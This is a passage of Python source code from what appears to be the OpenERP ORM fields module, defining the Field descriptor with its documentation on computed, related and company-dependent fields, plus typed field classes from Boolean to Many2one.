""" klasses = reversed(cls.__mro__) if reverse else cls.__mro__ for klass in klasses: if name in klass.__dict__: yield klass.__dict__[name] class MetaField(type): """ Metaclass for field classes. """ by_type = {} def __init__(cls, name, bases, attrs): super(MetaField, cls).__init__(name, bases, attrs) if cls.type: cls.by_type[cls.type] = cls # compute class attributes to avoid calling dir() on fields cls.column_attrs = [] cls.related_attrs = [] cls.description_attrs = [] for attr in dir(cls): if attr.startswith('_column_'): cls.column_attrs.append((attr[8:], attr)) elif attr.startswith('_related_'): cls.related_attrs.append((attr[9:], attr)) elif attr.startswith('_description_'): cls.description_attrs.append((attr[13:], attr)) class Field(object): """ The field descriptor contains the field definition, and manages accesses and assignments of the corresponding field on records. The following attributes may be provided when instanciating a field: :param string: the label of the field seen by users (string); if not set, the ORM takes the field name in the class (capitalized). :param help: the tooltip of the field seen by users (string) :param readonly: whether the field is readonly (boolean, by default ``False``) :param required: whether the value of the field is required (boolean, by default ``False``) :param index: whether the field is indexed in database (boolean, by default ``False``) :param default: the default value for the field; this is either a static value, or a function taking a recordset and returning a value :param states: a dictionary mapping state values to lists of UI attribute-value pairs; possible attributes are: 'readonly', 'required', 'invisible'. Note: Any state-based condition requires the ``state`` field value to be available on the client-side UI. This is typically done by including it in the relevant views, possibly made invisible if not relevant for the end-user. :param groups: comma-separated list of group xml ids (string); this restricts the field access to the users of the given groups only :param bool copy: whether the field value should be copied when the record is duplicated (default: ``True`` for normal fields, ``False`` for ``one2many`` and computed fields, including property fields and related fields) :param string oldname: the previous name of this field, so that ORM can rename it automatically at migration .. _field-computed: .. rubric:: Computed fields One can define a field whose value is computed instead of simply being read from the database. The attributes that are specific to computed fields are given below. To define such a field, simply provide a value for the attribute `compute`. :param compute: name of a method that computes the field :param inverse: name of a method that inverses the field (optional) :param search: name of a method that implement search on the field (optional) :param store: whether the field is stored in database (boolean, by default ``False`` on computed fields) The methods given for `compute`, `inverse` and `search` are model methods. Their signature is shown in the following example:: upper = fields.Char(compute='_compute_upper', inverse='_inverse_upper', search='_search_upper') @api.depends('name') def _compute_upper(self): for rec in self: self.upper = self.name.upper() if self.name else False def _inverse_upper(self): for rec in self: self.name = self.upper.lower() if self.upper else False def _search_upper(self, operator, value): if operator == 'like': operator = 'ilike' return [('name', operator, value)] The compute method has to assign the field on all records of the invoked recordset. The decorator :meth:`openerp.api.depends` must be applied on the compute method to specify the field dependencies; those dependencies are used to determine when to recompute the field; recomputation is automatic and guarantees cache/database consistency. Note that the same method can be used for several fields, you simply have to assign all the given fields in the method; the method will be invoked once for all those fields. By default, a computed field is not stored to the database, and is computed on-the-fly. Adding the attribute ``store=True`` will store the field's values in the database. The advantage of a stored field is that searching on that field is done by the database itself. The disadvantage is that it requires database updates when the field must be recomputed. The inverse method, as its name says, does the inverse of the compute method: the invoked records have a value for the field, and you must apply the necessary changes on the field dependencies such that the computation gives the expected value. Note that a computed field without an inverse method is readonly by default. The search method is invoked when processing domains before doing an actual search on the model. It must return a domain equivalent to the condition: `field operator value`. .. _field-related: .. rubric:: Related fields The value of a related field is given by following a sequence of relational fields and reading a field on the reached model. The complete sequence of fields to traverse is specified by the attribute :param related: sequence of field names Some field attributes are automatically copied from the source field if they are not redefined: `string`, `help`, `readonly`, `required` (only if all fields in the sequence are required), `groups`, `digits`, `size`, `translate`, `sanitize`, `selection`, `comodel_name`, `domain`, `context`. All semantic-free attributes are copied from the source field. By default, the values of related fields are not stored to the database. Add the attribute ``store=True`` to make it stored, just like computed fields. Related fields are automatically recomputed when their dependencies are modified. .. _field-company-dependent: .. rubric:: Company-dependent fields Formerly known as 'property' fields, the value of those fields depends on the company. In other words, users that belong to different companies may see different values for the field on a given record. :param company_dependent: whether the field is company-dependent (boolean) .. _field-incremental-definition: .. rubric:: Incremental definition A field is defined as class attribute on a model class. If the model is extended (see :class:`~openerp.models.Model`), one can also extend the field definition by redefining a field with the same name and same type on the subclass. In that case, the attributes of the field are taken from the parent class and overridden by the ones given in subclasses. For instance, the second class below only adds a tooltip on the field ``state``:: class First(models.Model): _name = 'foo' state = fields.Selection([...], required=True) class Second(models.Model): _inherit = 'foo' state = fields.Selection(help="Blah blah blah") """ __metaclass__ = MetaField _attrs = None # dictionary with all field attributes _free_attrs = None # list of semantic-free attribute names automatic = False # whether the field is automatically created ("magic" field) inherited = False # whether the field is inherited (_inherits) column = None # the column corresponding to the field setup_done = False # whether the field has been set up name = None # name of the field type = None # type of the field (string) relational = False # whether the field is a relational one model_name = None # name of the model of this field comodel_name = None # name of the model of values (if relational) inverse_fields = None # list of inverse fields (objects) store = True # whether the field is stored in database index = False # whether the field is indexed in database manual = False # whether the field is a custom field copy = True # whether the field is copied over by BaseModel.copy() depends = () # collection of field dependencies recursive = False # whether self depends on itself compute = None # compute(recs) computes field on recs inverse = None # inverse(recs) inverses field on recs search = None # search(recs, operator, value) searches on self related = None # sequence of field names, for related fields related_sudo = True # whether related fields should be read as admin company_dependent = False # whether `self` is company-dependent (property field) default = None # default(recs) returns the default value string = None # field label help = None # field tooltip readonly = False required = False states = None groups = False # csv list of group xml ids change_default = None # whether the field may trigger a "user-onchange" deprecated = None # whether the field is ... deprecated def __init__(self, string=None, **kwargs): kwargs['string'] = string self._attrs = {key: val for key, val in kwargs.iteritems() if val is not None} self._free_attrs = [] def new(self, **kwargs): """ Return a field of the same type as `self`, with its own parameters. """ return type(self)(**kwargs) def set_class_name(self, cls, name): """ Assign the model class and field name of `self`. """ self.model_name = cls._name self.name = name # determine all inherited field attributes attrs = {} for field in resolve_all_mro(cls, name, reverse=True): if isinstance(field, type(self)): attrs.update(field._attrs) else: attrs.clear() attrs.update(self._attrs) # necessary in case self is not in cls # initialize `self` with `attrs` if attrs.get('compute'): # by default, computed fields are not stored, not copied and readonly attrs['store'] = attrs.get('store', False) attrs['copy'] = attrs.get('copy', False) attrs['readonly'] = attrs.get('readonly', not attrs.get('inverse')) if attrs.get('related'): # by default, related fields are not stored attrs['store'] = attrs.get('store', False) # fix for function fields overridden by regular columns if not isinstance(attrs.get('column'), (NoneType, fields.function)): attrs.pop('store', None) for attr, value in attrs.iteritems(): if not hasattr(self, attr): self._free_attrs.append(attr) setattr(self, attr, value) if not self.string and not self.related: # related fields get their string from their parent field self.string = name.replace('_', ' ').capitalize() # determine self.default and cls._defaults in a consistent way self._determine_default(cls, name) self.reset() def _determine_default(self, cls, name): """ Retrieve the default value for `self` in the hierarchy of `cls`, and determine `self.default` and `cls._defaults` accordingly. """ self.default = None # traverse the class hierarchy upwards, and take the first field # definition with a default or _defaults for self for klass in cls.__mro__: if name in klass.__dict__: field = klass.__dict__[name] if not isinstance(field, type(self)): # klass contains another value overridden by self return if 'default' in field._attrs: # take the default in field, and adapt it for cls._defaults value = field._attrs['default'] if callable(value): from openerp import api self.default = value cls._defaults[name] = api.model( lambda recs: self.convert_to_write(value(recs)) ) else: self.default = lambda recs: value cls._defaults[name] = value return defaults = klass.__dict__.get('_defaults') or {} if name in defaults: # take the value from _defaults, and adapt it for self.default value = defaults[name] if callable(value): func = lambda recs: value(recs._model, recs._cr, recs._uid, recs._context) else: func = lambda recs: value self.default = lambda recs: self.convert_to_cache( func(recs), recs, validate=False, ) cls._defaults[name] = value return def __str__(self): return "%s.%s" % (self.model_name, self.name) def __repr__(self): return "%s.%s" % (self.model_name, self.name) ############################################################################ # # Field setup # def reset(self): """ Prepare `self` for a new setup. """ self.setup_done = False # self._triggers is a set of pairs (field, path) that represents the # computed fields that depend on `self`. When `self` is modified, it # invalidates the cache of each `field`, and registers the records to # recompute based on `path`. See method `modified` below for details. self._triggers = set() self.inverse_fields = [] def setup(self, env): """ Complete the setup of `self` (dependencies, recomputation triggers, and other properties). This method is idempotent: it has no effect if `self` has already been set up. """ if not self.setup_done: self._setup(env) self.setup_done = True def _setup(self, env): """ Do the actual setup of `self`. """ if self.related: self._setup_related(env) else: self._setup_regular(env) # put invalidation/recomputation triggers on field dependencies model = env[self.model_name] for path in self.depends: self._setup_dependency([], model, path.split('.')) # put invalidation triggers on model dependencies for dep_model_name, field_names in model._depends.iteritems(): dep_model = env[dep_model_name] dep_model._setup_fields() for field_name in field_names: field = dep_model._fields[field_name] field._triggers.add((self, None)) # # Setup of related fields # def _setup_related(self, env): """ Setup the attributes of a related field. """ # fix the type of self.related if necessary if isinstance(self.related, basestring): self.related = tuple(self.related.split('.')) # determine the chain of fields, and make sure they are all set up recs = env[self.model_name] fields = [] for name in self.related: recs._setup_fields() field = recs._fields[name] field.setup(env) recs = recs[name] fields.append(field) self.related_field = field # check type consistency if self.type != field.type: raise Warning("Type of related field %s is inconsistent with %s" % (self, field)) # determine dependencies, compute, inverse, and search self.depends = ('.'.join(self.related),) self.compute = self._compute_related self.inverse = self._inverse_related if field._description_searchable: # allow searching on self only if the related field is searchable self.search = self._search_related # copy attributes from field to self (string, help, etc.) for attr, prop in self.related_attrs: if not getattr(self, attr): setattr(self, attr, getattr(field, prop)) for attr in field._free_attrs: if attr not in self._free_attrs: self._free_attrs.append(attr) setattr(self, attr, getattr(field, attr)) # special case for states: copy it only for inherited fields if not self.states and self.inherited: self.states = field.states # special case for required: check if all fields are required if not self.store and not self.required: self.required = all(field.required for field in fields) def _compute_related(self, records): """ Compute the related field `self` on `records`. """ # when related_sudo, bypass access rights checks when reading values others = records.sudo() if self.related_sudo else records for record, other in zip(records, others): if not record.id: # draft record, do not switch to another environment other = record # traverse the intermediate fields; follow the first record at each step for name in self.related[:-1]: other = other[name][:1] record[self.name] = other[self.related[-1]] def _inverse_related(self, records): """ Inverse the related field `self` on `records`. """ for record in records: other = record # traverse the intermediate fields, and keep at most one record for name in self.related[:-1]: other = other[name][:1] if other: other[self.related[-1]] = record[self.name] def _search_related(self, records, operator, value): """ Determine the domain to search on field `self`. """ return [('.'.join(self.related), operator, value)] # properties used by _setup_related() to copy values from related field _related_comodel_name = property(attrgetter('comodel_name')) _related_string = property(attrgetter('string')) _related_help = property(attrgetter('help')) _related_readonly = property(attrgetter('readonly')) _related_groups = property(attrgetter('groups')) @property def base_field(self): """ Return the base field of an inherited field, or `self`. """ return self.related_field if self.inherited else self # # Setup of non-related fields # def _setup_regular(self, env): """ Setup the attributes of a non-related field. """ recs = env[self.model_name] def make_depends(deps): return tuple(deps(recs) if callable(deps) else deps) # convert compute into a callable and determine depends if isinstance(self.compute, basestring): # if the compute method has been overridden, concatenate all their _depends self.depends = () for method in resolve_all_mro(type(recs), self.compute, reverse=True): self.depends += make_depends(getattr(method, '_depends', ())) self.compute = getattr(type(recs), self.compute) else: self.depends = make_depends(getattr(self.compute, '_depends', ())) # convert inverse and search into callables if isinstance(self.inverse, basestring): self.inverse = getattr(type(recs), self.inverse) if isinstance(self.search, basestring): self.search = getattr(type(recs), self.search) def _setup_dependency(self, path0, model, path1): """ Make `self` depend on `model`; `path0 + path1` is a dependency of `self`, and `path0` is the sequence of field names from `self.model` to `model`. """ env = model.env head, tail = path1[0], path1[1:] model._setup_fields() if head == '*': # special case: add triggers on all fields of model (except self) fields = set(model._fields.itervalues()) - set([self]) else: fields = [model._fields[head]] for field in fields: if field == self: _logger.debug("Field %s is recursively defined", self) self.recursive = True continue field.setup(env) #_logger.debug("Add trigger on %s to recompute %s", field, self) field._triggers.add((self, '.'.join(path0 or ['id']))) # add trigger on inverse fields, too for invf in field.inverse_fields: #_logger.debug("Add trigger on %s to recompute %s", invf, self) invf._triggers.add((self, '.'.join(path0 + [head]))) # recursively traverse the dependency if tail: comodel = env[field.comodel_name] self._setup_dependency(path0 + [head], comodel, tail) @property def dependents(self): """ Return the computed fields that depend on `self`. """ return (field for field, path in self._triggers) ############################################################################ # # Field description # def get_description(self, env): """ Return a dictionary that describes the field `self`. """ desc = {'type': self.type} for attr, prop in self.description_attrs: value = getattr(self, prop) if callable(value): value = value(env) if value is not None: desc[attr] = value return desc # properties used by get_description() _description_store = property(attrgetter('store')) _description_manual = property(attrgetter('manual')) _description_depends = property(attrgetter('depends')) _description_related = property(attrgetter('related')) _description_company_dependent = property(attrgetter('company_dependent')) _description_readonly = property(attrgetter('readonly')) _description_required = property(attrgetter('required')) _description_states = property(attrgetter('states')) _description_groups = property(attrgetter('groups')) _description_change_default = property(attrgetter('change_default')) _description_deprecated = property(attrgetter('deprecated')) @property def _description_searchable(self): return bool(self.store or self.search or (self.column and self.column._fnct_search)) @property def _description_sortable(self): return self.store or (self.inherited and self.related_field._description_sortable) def _description_string(self, env): if self.string and env.lang: field = self.base_field name = "%s,%s" % (field.model_name, field.name) trans = env['ir.translation']._get_source(name, 'field', env.lang) return trans or self.string return self.string def _description_help(self, env): if self.help and env.lang: name = "%s,%s" % (self.model_name, self.name) trans = env['ir.translation']._get_source(name, 'help', env.lang) return trans or self.help return self.help ############################################################################ # # Conversion to column instance # def to_column(self): """ return a low-level field object corresponding to `self` """ assert self.store or self.column # determine column parameters _logger.debug("Create fields._column for Field %s", self) args = {} for attr, prop in self.column_attrs: args[attr] = getattr(self, prop) for attr in self._free_attrs: args[attr] = getattr(self, attr) if self.company_dependent: # company-dependent fields are mapped to former property fields args['type'] = self.type args['relation'] = self.comodel_name self.column = fields.property(**args) elif self.column: # let the column provide a valid column for the given parameters self.column = self.column.new(**args) else: # create a fresh new column of the right type self.column = getattr(fields, self.type)(**args) return self.column # properties used by to_column() to create a column instance _column_copy = property(attrgetter('copy')) _column_select = property(attrgetter('index')) _column_manual = property(attrgetter('manual')) _column_string = property(attrgetter('string')) _column_help = property(attrgetter('help')) _column_readonly = property(attrgetter('readonly')) _column_required = property(attrgetter('required')) _column_states = property(attrgetter('states')) _column_groups = property(attrgetter('groups')) _column_change_default = property(attrgetter('change_default')) _column_deprecated = property(attrgetter('deprecated')) ############################################################################ # # Conversion of values # def null(self, env): """ return the null value for this field in the given environment """ return False def convert_to_cache(self, value, record, validate=True): """ convert `value` to the cache level in `env`; `value` may come from an assignment, or have the format of methods :meth:`BaseModel.read` or :meth:`BaseModel.write` :param record: the target record for the assignment, or an empty recordset :param bool validate: when True, field-specific validation of `value` will be performed """ return value def convert_to_read(self, value, use_name_get=True): """ convert `value` from the cache to a value as returned by method :meth:`BaseModel.read` :param bool use_name_get: when True, value's diplay name will be computed using :meth:`BaseModel.name_get`, if relevant for the field """ return False if value is None else value def convert_to_write(self, value, target=None, fnames=None): """ convert `value` from the cache to a valid value for method :meth:`BaseModel.write`. :param target: optional, the record to be modified with this value :param fnames: for relational fields only, an optional collection of field names to convert """ return self.convert_to_read(value) def convert_to_onchange(self, value): """ convert `value` from the cache to a valid value for an onchange method v7. """ return self.convert_to_write(value) def convert_to_export(self, value, env): """ convert `value` from the cache to a valid value for export. The parameter `env` is given for managing translations. """ if env.context.get('export_raw_data'): return value return bool(value) and ustr(value) def convert_to_display_name(self, value): """ convert `value` from the cache to a suitable display name. """ return ustr(value) ############################################################################ # # Descriptor methods # def __get__(self, record, owner): """ return the value of field `self` on `record` """ if record is None: return self # the field is accessed through the owner class if not record: # null record -> return the null value for this field return self.null(record.env) # only a single record may be accessed record.ensure_one() try: return record._cache[self] except KeyError: pass # cache miss, retrieve value if record.id: # normal record -> read or compute value for this field self.determine_value(record) else: # draft record -> compute the value or let it be null self.determine_draft_value(record) # the result should be in cache now return record._cache[self] def __set__(self, record, value): """ set the value of field `self` on `record` """ env = record.env # only a single record may be updated record.ensure_one() # adapt value to the cache level value = self.convert_to_cache(value, record) if env.in_draft or not record.id: # determine dependent fields spec = self.modified_draft(record) # set value in cache, inverse field, and mark record as dirty record._cache[self] = value if env.in_onchange: for invf in self.inverse_fields: invf._update(value, record) record._set_dirty(self.name) # determine more dependent fields, and invalidate them if self.relational: spec += self.modified_draft(record) env.invalidate(spec) else: # simply write to the database, and update cache record.write({self.name: self.convert_to_write(value)}) record._cache[self] = value ############################################################################ # # Computation of field values # def _compute_value(self, records): """ Invoke the compute method on `records`. """ # initialize the fields to their corresponding null value in cache for field in self.computed_fields: records._cache[field] = field.null(records.env) records.env.computed[field].update(records._ids) self.compute(records) for field in self.computed_fields: records.env.computed[field].difference_update(records._ids) def compute_value(self, records): """ Invoke the compute method on `records`; the results are in cache. """ with records.env.do_in_draft(): try: self._compute_value(records) except (AccessError, MissingError): # some record is forbidden or missing, retry record by record for record in records: try: self._compute_value(record) except Exception as exc: record._cache[self.name] = FailedValue(exc) def determine_value(self, record): """ Determine the value of `self` for `record`. """ env = record.env if self.column and not (self.depends and env.in_draft): # this is a stored field or an old-style function field if self.depends: # this is a stored computed field, check for recomputation recs = record._recompute_check(self) if recs: # recompute the value (only in cache) self.compute_value(recs) # HACK: if result is in the wrong cache, copy values if recs.env != env: for source, target in zip(recs, recs.with_env(env)): try: values = target._convert_to_cache({ f.name: source[f.name] for f in self.computed_fields }, validate=False) except MissingError as e: values = FailedValue(e) target._cache.update(values) # the result is saved to database by BaseModel.recompute() return # read the field from database record._prefetch_field(self) elif self.compute: # this is either a non-stored computed field, or a stored computed # field in draft mode if self.recursive: self.compute_value(record) else: recs = record._in_cache_without(self) self.compute_value(recs) else: # this is a non-stored non-computed field record._cache[self] = self.null(env) def determine_draft_value(self, record): """ Determine the value of `self` for the given draft `record`. """ if self.compute: self._compute_value(record) else: record._cache[self] = SpecialValue(self.null(record.env)) def determine_inverse(self, records): """ Given the value of `self` on `records`, inverse the computation. """ if self.inverse: self.inverse(records) def determine_domain(self, records, operator, value): """ Return a domain representing a condition on `self`. """ if self.search: return self.search(records, operator, value) else: return [(self.name, operator, value)] ############################################################################ # # Notification when fields are modified # def modified(self, records): """ Notify that field `self` has been modified on `records`: prepare the fields/records to recompute, and return a spec indicating what to invalidate. """ # invalidate the fields that depend on self, and prepare recomputation spec = [(self, records._ids)] for field, path in self._triggers: if path and field.store: # don't move this line to function top, see log env = records.env(user=SUPERUSER_ID, context={'active_test': False}) target = env[field.model_name].search([(path, 'in', records.ids)]) if target: spec.append((field, target._ids)) target.with_env(records.env)._recompute_todo(field) else: spec.append((field, None)) return spec def modified_draft(self, records): """ Same as :meth:`modified`, but in draft mode. """ env = records.env # invalidate the fields on the records in cache that depend on # `records`, except fields currently being computed spec = [] for field, path in self._triggers: target = env[field.model_name] computed = target.browse(env.computed[field]) if path == 'id': target = records - computed elif path: target = (target.browse(env.cache[field]) - computed).filtered( lambda rec: rec._mapped_cache(path) & records ) else: target = target.browse(env.cache[field]) - computed if target: spec.append((field, target._ids)) return spec class Boolean(Field): type = 'boolean' def convert_to_cache(self, value, record, validate=True): return bool(value) def convert_to_export(self, value, env): if env.context.get('export_raw_data'): return value return ustr(value) class Integer(Field): type = 'integer' group_operator = None # operator for aggregating values _related_group_operator = property(attrgetter('group_operator')) _column_group_operator = property(attrgetter('group_operator')) def convert_to_cache(self, value, record, validate=True): if isinstance(value, dict): # special case, when an integer field is used as inverse for a one2many return value.get('id', False) return int(value or 0) def convert_to_read(self, value, use_name_get=True): # Integer values greater than 2^31-1 are not supported in pure XMLRPC, # so we have to pass them as floats :-( if value and value > xmlrpclib.MAXINT: return float(value) return value def _update(self, records, value): # special case, when an integer field is used as inverse for a one2many records._cache[self] = value.id or 0 class Float(Field): """ The precision digits are given by the attribute :param digits: a pair (total, decimal), or a function taking a database cursor and returning a pair (total, decimal) """ type = 'float' _digits = None # digits argument passed to class initializer digits = None # digits as computed by setup() group_operator = None # operator for aggregating values def __init__(self, string=None, digits=None, **kwargs): super(Float, self).__init__(string=string, _digits=digits, **kwargs) def _setup_digits(self, env): """ Setup the digits for `self` and its corresponding column """ self.digits = self._digits(env.cr) if callable(self._digits) else self._digits if self.digits: assert isinstance(self.digits, (tuple, list)) and len(self.digits) >= 2, \ "Float field %s with digits %r, expecting (total, decimal)" % (self, self.digits) if self.column: self.column.digits_change(env.cr) def _setup_regular(self, env): super(Float, self)._setup_regular(env) self._setup_digits(env) _related_digits = property(attrgetter('digits')) _related_group_operator = property(attrgetter('group_operator')) _description_digits = property(attrgetter('digits')) _column_digits = property(lambda self: not callable(self._digits) and self._digits) _column_digits_compute = property(lambda self: callable(self._digits) and self._digits) _column_group_operator = property(attrgetter('group_operator')) def convert_to_cache(self, value, record, validate=True): # apply rounding here, otherwise value in cache may be wrong! if self.digits: return float_round(float(value or 0.0), precision_digits=self.digits[1]) else: return float(value or 0.0) class _String(Field): """ Abstract class for string fields. """ translate = False _column_translate = property(attrgetter('translate')) _related_translate = property(attrgetter('translate')) _description_translate = property(attrgetter('translate')) class Char(_String): """ Basic string field, can be length-limited, usually displayed as a single-line string in clients :param int size: the maximum size of values stored for that field :param bool translate: whether the values of this field can be translated """ type = 'char' size = None def _setup(self, env): super(Char, self)._setup(env) assert isinstance(self.size, (NoneType, int)), \ "Char field %s with non-integer size %r" % (self, self.size) _column_size = property(attrgetter('size')) _related_size = property(attrgetter('size')) _description_size = property(attrgetter('size')) def convert_to_cache(self, value, record, validate=True): if value is None or value is False: return False return ustr(value)[:self.size] class Text(_String): """ Very similar to :class:`~.Char` but used for longer contents, does not have a size and usually displayed as a multiline text box. :param translate: whether the value of this field can be translated """ type = 'text' def convert_to_cache(self, value, record, validate=True): if value is None or value is False: return False return ustr(value) class Html(_String): type = 'html' sanitize = True # whether value must be sanitized _column_sanitize = property(attrgetter('sanitize')) _related_sanitize = property(attrgetter('sanitize')) _description_sanitize = property(attrgetter('sanitize')) def convert_to_cache(self, value, record, validate=True): if value is None or value is False: return False if validate and self.sanitize: return html_sanitize(value) return value class Date(Field): type = 'date' @staticmethod def today(*args): """ Return the current day in the format expected by the ORM. This function may be used to compute default values. """ return date.today().strftime(DATE_FORMAT) @staticmethod def context_today(record, timestamp=None): """ Return the current date as seen in the client's timezone in a format fit for date fields. This method may be used to compute default values. :param datetime timestamp: optional datetime value to use instead of the current date and time (must be a datetime, regular dates can't be converted between timezones.) :rtype: str """ today = timestamp or datetime.now() context_today = None tz_name = record._context.get('tz') or record.env.user.tz if tz_name: try: today_utc = pytz.timezone('UTC').localize(today, is_dst=False) # UTC = no DST context_today = today_utc.astimezone(pytz.timezone(tz_name)) except Exception: _logger.debug("failed to compute context/client-specific today date, using UTC value for `today`", exc_info=True) return (context_today or today).strftime(DATE_FORMAT) @staticmethod def from_string(value): """ Convert an ORM `value` into a :class:`date` value. """ value = value[:DATE_LENGTH] return datetime.strptime(value, DATE_FORMAT).date() @staticmethod def to_string(value): """ Convert a :class:`date` value into the format expected by the ORM. """ return value.strftime(DATE_FORMAT) def convert_to_cache(self, value, record, validate=True): if not value: return False if isinstance(value, basestring): if validate: # force parsing for validation self.from_string(value) return value[:DATE_LENGTH] return self.to_string(value) def convert_to_export(self, value, env): if value and env.context.get('export_raw_data'): return self.from_string(value) return bool(value) and ustr(value) class Datetime(Field): type = 'datetime' @staticmethod def now(*args): """ Return the current day and time in the format expected by the ORM. This function may be used to compute default values. """ return datetime.now().strftime(DATETIME_FORMAT) @staticmethod def context_timestamp(record, timestamp): """Returns the given timestamp converted to the client's timezone. This method is *not* meant for use as a _defaults initializer, because datetime fields are automatically converted upon display on client side. For _defaults you :meth:`fields.datetime.now` should be used instead. :param datetime timestamp: naive datetime value (expressed in UTC) to be converted to the client timezone :rtype: datetime :return: timestamp converted to timezone-aware datetime in context timezone """ assert isinstance(timestamp, datetime), 'Datetime instance expected' tz_name = record._context.get('tz') or record.env.user.tz if tz_name: try: utc = pytz.timezone('UTC') context_tz = pytz.timezone(tz_name) utc_timestamp = utc.localize(timestamp, is_dst=False) # UTC = no DST return utc_timestamp.astimezone(context_tz) except Exception: _logger.debug("failed to compute context/client-specific timestamp, " "using the UTC value", exc_info=True) return timestamp @staticmethod def from_string(value): """ Convert an ORM `value` into a :class:`datetime` value. """ value = value[:DATETIME_LENGTH] if len(value) == DATE_LENGTH: value += " 00:00:00" return datetime.strptime(value, DATETIME_FORMAT) @staticmethod def to_string(value): """ Convert a :class:`datetime` value into the format expected by the ORM. """ return value.strftime(DATETIME_FORMAT) def convert_to_cache(self, value, record, validate=True): if not value: return False if isinstance(value, basestring): if validate: # force parsing for validation self.from_string(value) value = value[:DATETIME_LENGTH] if len(value) == DATE_LENGTH: value += " 00:00:00" return value return self.to_string(value) def convert_to_export(self, value, env): if value and env.context.get('export_raw_data'): return self.from_string(value) return bool(value) and ustr(value) class Binary(Field): type = 'binary' class Selection(Field): """ :param selection: specifies the possible values for this field. It is given as either a list of pairs (`value`, `string`), or a model method, or a method name. :param selection_add: provides an extension of the selection in the case of an overridden field. It is a list of pairs (`value`, `string`). The attribute `selection` is mandatory except in the case of :ref:`related fields <field-related>` or :ref:`field extensions <field-incremental-definition>`. """ type = 'selection' selection = None # [(value, string), ...], function or method name selection_add = None # [(value, string), ...] def __init__(self, selection=None, string=None, **kwargs): if callable(selection): from openerp import api selection = api.expected(api.model, selection) super(Selection, self).__init__(selection=selection, string=string, **kwargs) def _setup(self, env): super(Selection, self)._setup(env) assert self.selection is not None, "Field %s without selection" % self def _setup_related(self, env): super(Selection, self)._setup_related(env) # selection must be computed on related field field = self.related_field self.selection = lambda model: field._description_selection(model.env) def set_class_name(self, cls, name): super(Selection, self).set_class_name(cls, name) # determine selection (applying 'selection_add' extensions) selection = None for field in resolve_all_mro(cls, name, reverse=True): if isinstance(field, type(self)): # We cannot use field.selection or field.selection_add here # because those attributes are overridden by `set_class_name`. if 'selection' in field._attrs: selection = field._attrs['selection'] if 'selection_add' in field._attrs: selection = selection + field._attrs['selection_add'] else: selection = None self.selection = selection def _description_selection(self, env): """ return the selection list (pairs (value, label)); labels are translated according to context language """ selection = self.selection if isinstance(selection, basestring): return getattr(env[self.model_name], selection)() if callable(selection): return selection(env[self.model_name]) # translate selection labels if env.lang: name = "%s,%s" % (self.model_name, self.name) translate = partial( env['ir.translation']._get_source, name, 'selection', env.lang) return [(value, translate(label) if label else label) for value, label in selection] else: return selection @property def _column_selection(self): if isinstance(self.selection, basestring): method = self.selection return lambda self, *a, **kw: getattr(self, method)(*a, **kw) else: return self.selection def get_values(self, env): """ return a list of the possible values """ selection = self.selection if isinstance(selection, basestring): selection = getattr(env[self.model_name], selection)() elif callable(selection): selection = selection(env[self.model_name]) return [value for value, _ in selection] def convert_to_cache(self, value, record, validate=True): if not validate: return value or False if value in self.get_values(record.env): return value elif not value: return False raise ValueError("Wrong value for %s: %r" % (self, value)) def convert_to_export(self, value, env): if not isinstance(self.selection, list): # FIXME: this reproduces an existing buggy behavior! return value for item in self._description_selection(env): if item[0] == value: return item[1] return False class Reference(Selection): type = 'reference' size = None def __init__(self, selection=None, string=None, **kwargs): super(Reference, self).__init__(selection=selection, string=string, **kwargs) def _setup(self, env): super(Reference, self)._setup(env) assert isinstance(self.size, (NoneType, int)), \ "Reference field %s with non-integer size %r" % (self, self.size) _related_size = property(attrgetter('size')) _column_size = property(attrgetter('size')) def convert_to_cache(self, value, record, validate=True): if isinstance(value, BaseModel): if ((not validate or value._name in self.get_values(record.env)) and len(value) <= 1): return value.with_env(record.env) or False elif isinstance(value, basestring): res_model, res_id = value.split(',') return record.env[res_model].browse(int(res_id)) elif not value: return False raise ValueError("Wrong value for %s: %r" % (self, value)) def convert_to_read(self, value, use_name_get=True): return "%s,%s" % (value._name, value.id) if value else False def convert_to_export(self, value, env): return bool(value) and value.name_get()[0][1] def convert_to_display_name(self, value): return ustr(value and value.display_name) class _Relational(Field): """ Abstract class for relational fields. """ relational = True domain = None # domain for searching values context = None # context for searching values def _setup(self, env): super(_Relational, self)._setup(env) if self.comodel_name not in env.registry: _logger.warning("Field %s with unknown comodel_name %r" % (self, self.comodel_name)) self.comodel_name = '_unknown' @property def _related_domain(self): if callable(self.domain): # will be called with another model than self's return lambda recs: self.domain(recs.env[self.model_name]) else: # maybe not correct if domain is a string... return self.domain _related_context = property(attrgetter('context')) _description_relation = property(attrgetter('comodel_name')) _description_context = property(attrgetter('context')) def _description_domain(self, env): return self.domain(env[self.model_name]) if callable(self.domain) else self.domain _column_obj = property(attrgetter('comodel_name')) _column_domain = property(attrgetter('domain')) _column_context = property(attrgetter('context')) def null(self, env): return env[self.comodel_name] def modified(self, records): # Invalidate cache for self.inverse_fields, too. Note that recomputation # of fields that depend on self.inverse_fields is already covered by the # triggers (see above). spec = super(_Relational, self).modified(records) for invf in self.inverse_fields: spec.append((invf, None)) return spec class Many2one(_Relational): """ The value of such a field is a recordset of size 0 (no record) or 1 (a single record). :param comodel_name: name of the target model (string) :param domain: an optional domain to set on candidate values on the client side (domain or string) :param context: an optional context to use on the client side when handling that field (dictionary) :param ondelete: what to do when the referred record is deleted; possible values are: ``'set null'``, ``'restrict'``, ``'cascade'`` :param auto_join: whether JOINs are generated upon search through that field (boolean, by default ``False``) :param delegate: set it to ``True`` to make fields of the target model accessible from the current model (corresponds to ``_inherits``) The attribute `comodel_name` is mandatory except in the case of related fields or field extensions. """ type = 'many2one' ondelete = 'set null' # what to do when value is deleted auto_join = False # whether joins are generated upon search delegate = False # whether self implements delegation def __init__(self, comodel_name=None, string=None, **kwargs): super(Many2one, self).__init__(comodel_name=comodel_name, string=string, **kwargs) def set_class_name(self, cls, name): super(Many2one, self).set_class_name(cls, name) # determine self.delegate if not self.delegate: self.delegate = name in cls._inherits.values() _column_ondelete = property(attrgetter('ondelete')) _column_auto_join = property(attrgetter('auto_join')) def _update(self, records, value): """ Update the cached value of `self` for `records` with `value`. """ records._cache[self] = value def convert_to_cache(self, value, record, validate=True): if isinstance(value, (NoneType, int, long)): return record.env[self.comodel_name].browse(value) if isinstance(value, BaseModel): if value._name == self.comodel_name and len(value) <= 1: return value.with_env(record.env) raise ValueError("Wrong value for %s: %r" % (self, value)) elif isinstance(value, tuple): return record.env[self.comodel_name].browse(value[0]) elif isinstance(value, dict): return record.env[self.comodel_name].new(value) else: return self.null(record.env) def convert_to_read(self, value, use_name_get=True): if use_name_get and 